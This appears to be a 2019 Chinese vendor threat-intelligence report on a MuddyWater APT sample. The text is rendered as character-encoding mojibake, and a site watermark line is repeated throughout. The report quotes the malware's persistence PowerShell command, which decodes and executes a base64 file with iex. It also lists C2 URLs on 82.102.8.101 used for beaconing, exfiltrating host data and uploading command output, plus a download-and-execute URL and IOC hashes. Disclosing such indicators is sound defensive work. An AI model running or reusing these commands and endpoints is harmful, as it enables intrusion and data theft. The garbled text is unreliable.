MuddyWater£¨ÎÛË®£©×îй¥»÷Ñù±¾·ÖÎö

°ä²¼¹¦·ò 2019-05-10
MuddyWaterÊÇÒ»¸öÀ´×ÔÓÚÒÁÀʵÄÖØÒªÕë¶ÔÖж«µØÓò½øÐй¥»÷µÄAPT×éÖ¯£¬Æä¹¥»÷Ö¸±êÖØÒª¼¯ÖÐÓÚµ±¾Ö¡¢µçÐż°ÄÜÔ´µÈÁìÓò¡£

½üÈÕ£¬GA»Æ½ð¼×½ð¾¦°²È«×êÑÐÍŶÓͨ¹ýVenusEyeÍþвµý±¨ÖÐÐÄá÷ÁÔϵͳ²¶»ñµ½Ò»¸ö¿ÉÒÉÎĵµ£¬¾­¹ý¶ÈÎöÈ·ÈÏÆäΪMuddyWater×îй¥»÷Ñù±¾¡£


ÔØºÉ·ÖÎö


¹¥»÷Ñù±¾ÎªÒ»¸öWordÎĵµ£¬´ò¿ªºó»áÏÔʾÈçÏÂͼƬ£¬ÓÕʹÊܺ¦Õ߯ôÓúê¡£

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

ºê´úÂëÖ´Ðк󣬻ῪÊÍc:\programdata\SysTextEnc.iniÎļþ¡£¸ÃÎļþÄÚÈÝΪһ´®Base64±àÂëÊý¾Ý¡£

¶øºóÏòÆô¶¯ÏîдÈëÈçϺÅÁîÐУº
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

ÓÃÓÚ¿ª»ú½âÃܲ¢Ö´ÐÐc:\programdata\SysTextEnc.iniÎļþ¡£½âÃÜÖ®ºóΪһ¶Îpowershell´úÂ룬¸Ã´úÂëÓÃÓÚÒªÇóhxxp://38.132.99.167/crf.txtÁ´½ÓµÄÊý¾Ý²¢Ö´ÐУ¬¸ÃÁ´½Ó·µ»ØµÄÊý¾ÝÒÀÈ»ÊÇÒ»¶ÎPowershell´úÂë¡£
 

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾



ľÂí·ÖÎö


ÉÏÊö¹ý³ÌÖÐÏÂÔØµÄPowershell´úÂë¼´MuddyWater×éÖ¯¹ßÓõÄpowershellľÂí¡£

½â»ìºÏºó£¬ÆäÖ÷º¯ÊýÈçÏÂËùʾ£º

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

˳´ÎÖ´ÐÐwlChecul£¬pmrHlsl£¬GECOANOO£¬gfxEcmdascrsltpÕâËĸöº¯Êý¡£ÆäÖÐwlCheculÖ»ÊÇΪÁËÈ·ÈÏ·þÎñÆ÷³ï±¸×´Ì¬¡£»ú¹ØÈçÏÂURL²¢ÒÔPOST·½Ê½·¢ËÍÒªÇó£º
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

ÈôÊÇ·µ»ØÖµ²»Îª¿ÕÇÒ²»Îª%COPYTHAT%²Å»áÖ´ÐкóÐøº¯Êý¡£Ö®ºóÖ´ÐÐpmrHlslº¯Êý£¬¸Ãº¯Êý»áŲÓÃWMI»ñÈ¡¶àÖÖÍÆËã»úÐÅÏ¢¡£
 
GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

½«»ñµÃµÄÐÅϢʹÓá°*¡±½øÐÐÆ´½Ó¡£ÍÆËãÆ´½Óºó×Ö·û´®µÄMD5£¬Ôٺ͡°*1997* EP1¡±½øÐÐÆ´½Ó£¬×îºó½øÐÐbase64±àÂë¡£

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾
 
Ö®ºó½«»ú¹Ø³öÀ´µÄBase64±àÂëÊý¾ÝÆ´½Ó³ÉÈçÏÂURL²¢ÒÔPOST·½Ê½·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

ÈôÊÇ·µ»ØÁ˾ֲ»Îª¿Õ²¢ÇÒ²»Îª%BYE%Ôò³ÖÐøºóÐøº¯ÊýµÄÖ´ÐС£½ÓÏÂÀ´ÒªÖ´Ðеĺ¯ÊýΪGECOANOO¡£

GeCOANOOº¯Êý»ú¹ØÈçÏÂÊý¾Ý£¬²¢ÒÔPOST·½Ê½½«Æä·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

ÆäÖеÄEncryptedData¼´ÉÏÒ»´Î·¢ËÍÊý¾ÝÖнøÐÐBase64±àÂëµÄMD5²¿ÃÅ¡£ÈôÊÇ·µ»ØÁ˾ֲ»Îª¿ÕÇÒ·µ»ØÖµ¾­¹ýbase64½âÂëºó²»Îª"SHH"£¬Ôò½«½âÂëºóµÄ·µ»ØÖµ¸³Öµ¸øÒ»¸öÈ«¾Ö±äÁ¿gecdrEu£¬¶øºóÖ´ÐÐÏÂÒ»¸öº¯Êý£¬Äܹ»Åжϸ³Öµ¸øgecdrEuµÄÊý¾ÝΪһ¶Îpowershell´úÂë¡£
 
GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

×îºóͨ¹ýgfxEcmdascrsltpº¯ÊýÖ´ÐÐÈ«¾Ö±äÁ¿ÖеÄgecdrEuÖеÄpowershell´úÂë¡£
 
GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

²¢½«·µ»ØÖµ½øÐÐbase64±àÂ룬ƴ´Õ³ÉÈçϵÄURLÌåʽ½øÐÐÉÏ´«¡£
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]


ËÝÔ´·ÖÎö


ͨ¹ýVenusEyeÍþвµý±¨ÖÐÐĹØÁªÏµÍ³£¬ÎÒÃÇ·¢ÏÖÁËÁíÒ»¸öÔçÆÚµÄÑù±¾¡£

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

¸ÃÑù±¾ËùʹÓõļ¼Êõ¶¼Óë±¾´ÎÎÒÃÇ·¢ÏÖµÄÑù±¾Ç§ÆªÒ»ÂÉ¡£

ͨ¹ýËÝÔ´·ÖÎö£¬ÎÒÃÇ·¢ÏÖÕâÁ½¸öÑù±¾¶¼ÓëÓÑÉÌ4ÔÂ10ÈÕÔÚÉ罻ýÌåÉÏÅû¶µÄMuddyWater¹¥»÷ÍÁ¶úÆäµÄÑù±¾ÀàËÆ¡£ÏÂÃæÊÇÁ½Õߵĺê´úÂë¶Ô±È¡£

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


ͨ¹ý¶Ô±ÈÄܹ»·¢ÏÖ£¬¶þÕß¶¼Ê¹ÓÃÒ»ÑùµÄ·½Ê½»ñÈ¡ÍÆËã»úÐÅÏ¢£¬¶øºóʹÓÃÒ»ÑùµÄÍÆËã·½Ê½ÍÆËãÊܺ¦ÕßÖ÷»úµÄΨһ±êʶ¡£

 

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


Ïà±È֮ϣ¬ÔçÆÚ·¢ÏÖµÄÑù±¾½«ÉÏÏßÒªÇó¡¢»ñÈ¡powershell´úÂë¡¢ÉÏ´«ºÅÁîÐÐÖ´ÐÐÁ˾ֲð·Ö³É·ÖÆçPHP½øÐн»»¥¡£¶ø´Ë¿ÌµÄ°æ±¾ÔòʹÓÃͳһ¸öPHPÎļþ½øÐн»»¥¡£²¢ÇÒÔçÆÚ°æ±¾ÈôÊÇÔÚÖ´Ðйý³ÌÖÐÓöµ½ÃýÎó£¬Ôò»á½«ÃýÎóÐÅÏ¢¼Í¼ÈÕÖ¾£¬µ«ÊÇ×îа汾ÔòÖ±½ÓʵÏÖµ±Ç°·¨Ê½¡£

¶ÔÓÚÖ´ÐÐÁ÷³ÌÀ´Ëµ£¬×îа汾Ïà¶ÔÓÚÔçÆÚ°æ±¾Ò²Óнϴó·ÖÆç£¬¶þÕßµÄÖ´ÐÐÁ÷³ÌÈçÏ£º

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾
 
Ïà±È֮ϣ¬×îÐµĹ¥»÷»î¶¯Ôö³¤ÁËÆä»ù´¡ÉèÊ©£¬²¢ÇÒ½«Ö÷Ìå´úÂë¸éÖõ½Ô¶³Ì·þÎñÆ÷Öжø²»ÊÇÖ±½Óͨ¹ý´¹µöÎĵµ¿ªÊ͵½±¾µØ¡ £Äܹ»¿´³ö¸Ã×éÖ¯ÔÚ²»ÐݵĸüÐÂÆä¹¥»÷·½Ê½ºÍ·À¼ì²â·½Ê½¡£



×ܽá


MuddyWater×éÖ¯×ÔÅû¶֮³õÒ»Ïò»îÔ¾ÖÁ½ñ£¬¸Ã×éÖ¯¼«¶ÈÇàíùʹÓÃPowershell½ÅÕý±¾±àдÆä¹¥»÷¹¤¾ß£¬²¢ÑÜÉú³öÁ˸Ã×éÖ¯µÄרÓÐľÂíPOWERSTATS¡£¹ÌÈ»¸Ã×éÖ¯µÄPowershellľÂí¸üл»´úºÜ¿ì£¬µ«ÊÇÎÒÃÇÈÔÄÜ´ÓÆäpowershell´úÂëÖп´µ½Ð©ÐíPOWERSTATSµÄÓ°×Ó¡£


Íþвָ±ê£¨IOC£©


97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt


½â¾ö¹æ»®


1¡¢GA»Æ½ð¼×VenusEyeÍþвµý±¨ÖÐÐÄÒѾ­Ö§³Ö¶Ô±¾´Î¹¥»÷»î¶¯Óйصý±¨µÄ²éÎÊ¡£

2¡¢ ÒѲ¿ÊðGA»Æ½ð¼×IDS¡¢IPS²úÆ·µÄ¿Í»§ÇëÉý¼¶ÊÂÎñ¿âµ½×îа汾£¬¼´¿ÉÓÐЧ¼ì²â»ò×è¶Ï¹¥»÷¡£

3¡¢ ÒѲ¿ÊðGA»Æ½ð¼×APT¼ì²â²úÆ·µÄ¿Í»§ÎÞÐèÉý¼¶£¬¼´¿ÉÓÐЧ¼ì²âÕâ´Î¹¥»÷¡£

 

GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾